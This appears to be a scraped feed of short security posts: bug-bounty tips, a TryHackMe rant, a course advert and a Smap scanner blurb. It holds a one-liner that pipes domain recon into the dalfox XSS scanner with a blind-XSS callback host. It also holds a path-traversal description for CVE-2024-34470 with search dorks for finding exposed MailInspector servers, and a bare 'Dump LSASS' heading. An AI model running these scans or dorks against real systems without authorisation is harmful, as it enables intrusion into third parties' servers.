🔼 One-Liner XSS 🔽

subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter

💥Methods for Dump LSASS💥

☄️KnoXSS XSS Payload - confirm?.(1)
🔍Credit- @lu3ky13

#bugbounty #bugbountytips

👀Top 1% on TryHackMe? That’s Cute👀

🤡I've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

🙂In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

✉️Thoughts?

☄️CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

📣An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

🚫PoC: https://lnkd.in/gK4NHJ4C
⛔️Video POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

🌐Dorks:
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."

💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥

⚠️Slots Remaining 4

💯Registration Link: https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!

🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module: https://lnkd.in/gfZbBCFn

☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️

🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security

🛡Join The Discussion Group
🔗https://news.1rj.ru/str/brutsec